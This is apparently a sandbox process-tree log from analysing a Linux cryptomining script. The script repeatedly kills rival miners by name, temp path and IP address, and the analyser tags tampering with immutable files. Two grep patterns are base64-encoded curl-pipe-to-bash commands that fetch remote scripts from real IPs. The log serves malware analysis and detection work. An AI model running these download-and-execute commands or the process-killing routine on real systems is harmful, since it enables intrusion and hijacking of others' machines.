  PID:1018
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1028
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1027
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1029
- /bin/grep
  grep -v grep
  2⤵
  PID:1026
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1025
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1034
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1035
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1036
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1032
- /bin/grep
  grep -v grep
  2⤵
  PID:1033
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1040
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1039
- /bin/grep
  grep -v grep
  2⤵
  PID:1038
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1041
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1037
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1047
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1046
- /bin/grep
  grep -v grep
  2⤵
  PID:1045
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1048
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1044
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1054
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1055
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1053
- /bin/grep
  grep -v grep
  2⤵
  PID:1052
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1051
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1059
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1058
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1060
- /bin/grep
  grep -v grep
  2⤵
  PID:1057
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1056
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1066
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1065
- /bin/grep
  grep -v grep
  2⤵
  PID:1064
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1067
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1063
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:1072
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1073
- /bin/grep
  grep -v grep
  2⤵
  PID:1071
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1070
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1074
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1079
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:1078
- /bin/grep
  grep -v grep
  2⤵
  PID:1077
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1080
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1076
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1087
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:1086
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1088
- /bin/grep
  grep -v grep
  2⤵
  PID:1085
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1084
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1094
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:1093
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1095
- /bin/grep
  grep -v grep
  2⤵
  PID:1092
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1091
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1103
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:1102
- /bin/grep
  grep -v grep
  2⤵
  PID:1101
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1104
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1100
- /bin/grep
  grep -v grep
  2⤵
  PID:1107
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1106
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1108
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1109
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1110
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1115
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:1114
- /bin/grep
  grep -v grep
  2⤵
  PID:1113
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1116
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1112
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:1122
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1123
- /bin/grep
  grep -v grep
  2⤵
  PID:1121
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1124
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1120
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1128
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:1127
- /bin/grep
  grep -v grep
  2⤵
  PID:1126
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1129
- /bin/ps
  ps aux
  2⤵
  PID:1125
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1134
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:1133
- /bin/grep
  grep -v grep
  2⤵
  PID:1132
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1135
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1131
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1140
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:1139
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1141
- /bin/grep
  grep -v grep
  2⤵
  PID:1138
- /bin/ps
  ps aux
  2⤵
  PID:1137
- /bin/grep
  grep -v grep
  2⤵
  PID:1143
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1142
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:1144
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1146
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1150
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:1149
- /bin/grep
  grep -v grep
  2⤵
  PID:1148
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1151
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1147
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1155
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:1154
- /bin/grep
  grep -v grep
  2⤵
  PID:1153
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1156
- /bin/ps
  ps aux
  2⤵
  PID:1152
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1160
- /bin/grep
  grep HiPxCJRS
  2⤵
  - System Network Configuration Discovery
  PID:1159
- /bin/grep
  grep -v grep
  2⤵
  PID:1158
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1161
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1157
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:1164
- /bin/grep
  grep -v grep
  2⤵
  PID:1163
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1162
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1165
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1166
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1170
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:1169
- /bin/grep
  grep -v grep
  2⤵
  PID:1168
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1171
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1167
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1175
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:1174
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1176
- /bin/grep
  grep -v grep
  2⤵
  PID:1173
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1172
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1180
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:1179
- /bin/grep
  grep -v grep
  2⤵
  PID:1178
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1181
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1177
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1185
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:1184
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1186
- /bin/grep
  grep -v grep
  2⤵
  PID:1183
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1182
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1190
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1189
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1191
- /bin/grep
  grep -v grep
  2⤵
  PID:1188
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1187
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1195
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:1194
- /bin/grep
  grep -v grep
  2⤵
  PID:1193
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1192
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1199
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:1198
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1200
- /bin/grep
  grep -v grep
  2⤵
  PID:1197
- /bin/ps
  ps aux
  2⤵
  PID:1196
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1205
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1204
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:1203
- /bin/grep
  grep -v grep
  2⤵
  PID:1202
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1201
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1209
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:1208
- /bin/grep
  grep -v grep
  2⤵
  PID:1207
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1206
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1210
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:1213
- /bin/grep
  grep -v grep
  2⤵
  PID:1212
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1214
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1211
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1215
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1219
- /bin/grep
  grep nqscheduler
  2⤵
  PID:1218
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1220
- /bin/grep
  grep -v grep
  2⤵
  PID:1217
- /bin/ps
  ps aux
  2⤵
  PID:1216
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1224
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1225
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:1223
- /bin/grep
  grep -v grep
  2⤵
  PID:1222
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1221
- /bin/grep
  grep "]"
  2⤵
  PID:1229
- /bin/grep
  grep -v aux
  2⤵
  PID:1228
- /bin/grep
  grep -v grep
  2⤵
  PID:1227
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:1230
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1226
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1231
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1238
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1237
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:1236
- /bin/grep
  grep -v grep
  2⤵
  PID:1235
- /bin/ps
  ps aux
  2⤵
  PID:1234
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1243
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:1242
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1244
- /bin/grep
  grep -v grep
  2⤵
  PID:1241
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1240
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:1248
- /bin/grep
  grep -v grep
  2⤵
  PID:1247
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1246
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1249
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1250
- /bin/grep
  grep -v -
  2⤵
  PID:1256
- /bin/grep
  grep -v /
  2⤵
  PID:1255
- /bin/grep
  grep -v _
  2⤵
  PID:1257
- /bin/grep
  grep -v grep
  2⤵
  PID:1254
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:1258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1259
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1266
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1265
- /bin/grep
  grep "\\[^"
  2⤵
  PID:1264
- /bin/grep
  grep -v grep
  2⤵
  PID:1263
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1262
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1272
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1271
- /bin/grep
  grep rsync
  2⤵
  PID:1270
- /bin/grep
  grep -v grep
  2⤵
  PID:1269
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1268
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1277
- /bin/grep
  grep watchd0g
  2⤵
  PID:1276
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1278
- /bin/grep
  grep -v grep
  2⤵
  PID:1275
- /bin/ps
  ps aux
  2⤵
  PID:1274
- /bin/grep
  grep -v grep
  2⤵
  PID:1282
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1281
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1284
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1285
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:1283
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1290
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1291
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:1289
- /bin/grep
  grep -v grep
  2⤵
  PID:1288
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1287
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1296
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1295
- /bin/grep
  grep -v grep
  2⤵
  PID:1294
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1293
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1304
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1303
- /bin/grep
  grep -v grep
  2⤵
  PID:1301
- /bin/grep
  grep gitee.com
  2⤵
  PID:1302
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1300
- /bin/grep
  grep /tmp/java
  2⤵
  PID:1309
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1310
- /bin/grep
  grep -v grep
  2⤵
  PID:1308
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1311
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1307
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1317
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1316
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:1315
- /bin/grep
  grep -v grep
  2⤵
  PID:1314
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1313
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1322
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:1321
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1323
- /bin/grep
  grep -v grep
  2⤵
  PID:1320
- /bin/ps
  ps aux
  2⤵
  PID:1319
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1329
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:1328
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1330
- /bin/grep
  grep -v grep
  2⤵
  PID:1327
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1326
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1333
- /bin/grep
  grep kthrotlds
  2⤵
  PID:1335
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1336
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1337
- /bin/grep
  grep -v grep
  2⤵
  PID:1334
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1342
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:1341
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1343
- /bin/grep
  grep -v grep
  2⤵
  PID:1340
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1339
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1348
- /bin/grep
  grep netdns
  2⤵
  PID:1347
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1349
- /bin/grep
  grep -v grep
  2⤵
  PID:1346
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1345
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1355
- /bin/grep
  grep watchdogs
  2⤵
  PID:1354
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1356
- /bin/grep
  grep -v grep
  2⤵
  PID:1353
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1352
- /bin/grep
  grep -v root
  2⤵
  PID:1360
- /bin/grep
  grep -v dblaunch
  2⤵
  PID:1361
- /bin/grep
  grep -v grep
  2⤵
  PID:1359
- /bin/grep
  grep -v dblaunchs
  2⤵
  PID:1362
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1358
- /bin/grep
  grep -v dblaunched
  2⤵
  PID:1363
- /bin/grep
  grep -v apache2
  2⤵
  PID:1364
- /bin/grep
  grep -v atd
  2⤵
  PID:1365
- /bin/grep
  grep -v kdevtmpfsi
  2⤵
  PID:1366
- /bin/grep
  grep -v postgresq1
  2⤵
  PID:1367
- /usr/bin/awk
  awk "\$3>80.0{print \$2}"
  2⤵
  PID:1368
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1369
- /bin/grep
  grep -v aux
  2⤵
  PID:1373
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1375
- /bin/grep
  grep -v grep
  2⤵
  PID:1372
- /bin/grep
  grep " ps"
  2⤵
  PID:1374
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1371
- /bin/grep
  grep sync_supers
  2⤵
  PID:1379
- /bin/grep
  grep -v grep
  2⤵
  PID:1378
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1377
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1380
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1381
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:1385
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1386
- /bin/grep
  grep cpuset
  2⤵
  PID:1384
- /bin/grep
  grep -v grep
  2⤵
  PID:1383
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1382
- /bin/grep
  grep "x]"
  2⤵
  PID:1390
- /bin/grep
  grep -v aux
  2⤵
  PID:1389
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1391
- /bin/grep
  grep -v grep
  2⤵
  PID:1388
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1392
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1387
- /bin/grep
  grep "sh] <"
  2⤵
  PID:1396
- /bin/grep
  grep -v aux
  2⤵
  PID:1395
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1397
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1398
- /bin/grep
  grep -v grep
  2⤵
  PID:1394
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1393
- /bin/grep
  grep " \\[]"
  2⤵
  PID:1402
- /bin/grep
  grep -v aux
  2⤵
  PID:1401
- /bin/grep
  grep -v grep
  2⤵
  PID:1400
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1403
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1404
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1399
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1408
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1409
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:1407
- /bin/grep
  grep -v grep
  2⤵
  PID:1406
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1405
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1413
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1414
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:1412
- /bin/grep
  grep -v grep
  2⤵
  PID:1411
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1410
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1418
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1419
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:1417
- /bin/grep
  grep -v grep
  2⤵
  PID:1416
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1415
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1423
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1424
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:1422
- /bin/grep
  grep -v grep
  2⤵
  PID:1421
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1420
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1429
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1428
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:1427
- /bin/grep
  grep -v grep
  2⤵
  PID:1426
- /bin/ps
  ps aux
  2⤵
  PID:1425
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1433
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  - System Network Configuration Discovery
  PID:1432
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1434
- /bin/grep
  grep -v grep
  2⤵
  PID:1431
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1430
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:1437
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1438
- /bin/grep
  grep -v grep
  2⤵
  PID:1436
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1439
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1435
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:1442
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1443
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1444
- /bin/grep
  grep -v grep
  2⤵
  PID:1441
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1440
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1448
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:1447
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1449
- /bin/grep
  grep -v grep
  2⤵
  PID:1446
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1453
- /bin/grep
  grep sustse
  2⤵
  PID:1452
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1454
- /bin/grep
  grep -v grep
  2⤵
  PID:1451
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1450
- /bin/grep
  grep sustse3
  2⤵
  PID:1457
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1458
- /bin/grep
  grep -v grep
  2⤵
  PID:1456
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1459
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1455
- /bin/grep
  grep wget
  2⤵
  PID:1463
- /bin/grep
  grep mr.sh
  2⤵
  PID:1462
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1464
- /bin/grep
  grep -v grep
  2⤵
  PID:1461
- /usr/bin/xargs
